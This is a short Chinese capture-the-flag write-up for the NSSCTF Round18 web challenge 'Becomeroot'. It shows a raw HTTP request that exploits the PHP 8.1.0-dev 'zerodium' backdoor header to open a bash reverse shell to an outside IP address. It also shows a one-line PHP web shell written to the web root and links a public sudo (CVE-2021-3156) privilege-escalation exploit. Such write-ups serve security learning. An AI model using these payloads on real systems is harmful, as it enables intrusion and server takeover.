NSSCTF Round18(情人节专场)

Web

Becomeroot

发现php版本是PHP/8.1.0-dev

搜索发现存在后门执行漏洞

https://cloud.tencent.com/developer/article/1839234

1
2
3
4
5
6
7
8
9
GET / HTTP/1.1
Host: node1.anna.nssctf.cn:28752
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/101.34.80.152/9999 0>&1'"); //尝试反弹shell
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

最开始反弹shell一直受很多限制,最主要是cve上传不上去

最开始知道是提权,不知到咋提权,去找了出题人,上了提示。。。继续努力还是没出

知道下午4点半,想着连蚁剑传文件方便啊,后面写了个马

1
User-Agentt: zerodiumfile_put_contents ("/var/www/html/a.php","<?php eval($_POST['a'])");

连上蚁剑,是CVE-2021-3156

用到payloadhttps://github.com/Rvn0xsy/CVE-2021-3156-plus

蚁剑传上去编译,在这里发现命令执行还是没有回显,奇奇怪怪的。。。

image-20240214165615792

马已将传上去了,后面弹了shell,拿到了flag

image-20240214165706455